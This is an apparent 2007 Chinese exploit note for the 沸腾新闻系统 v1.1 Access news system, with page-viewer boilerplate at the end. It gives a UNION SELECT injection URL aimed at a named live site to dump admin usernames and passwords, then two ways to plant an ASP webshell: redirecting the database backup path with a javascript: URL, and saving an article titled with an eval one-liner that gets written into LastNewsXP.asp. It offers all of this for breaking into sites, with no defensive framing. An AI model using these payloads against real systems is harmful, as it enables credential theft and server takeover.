📄 沸腾新闻系统 v1.1 access版 finish(sp2) 注入漏洞.txt
字号:
作者:LiJun027 日期:2007-05-10
http://zk.shangdu.com/News.asp?click=1&shu=20 1 as NewsID,username as title,3 as updatetime,passwd as click,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin union select top 2
SP2的29个字段, SP1的28个字段
啥也不说了,自己看着办吧。。
-----------------
后台“图文管理”里添加文章,上传一个flash文件
点附加管理里的备份压缩
数据库地址为只读
打开恢复数据库窗口。IE输入
javascript:alert(window.frames['list'].document.forms[0].backpath.value="/data/x.asp");
就可自定义马的地址了
注意,上面这句js脚本,搞站经常能用上
如果没有备份数据库的权限
也可以在后台添加一个文章,标题为<%eval request(chr(120))%>
然后访问CreateASP.asp更新LastNewsXP.asp这个文件
后门就写到LastNewsXP.asp里面了
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -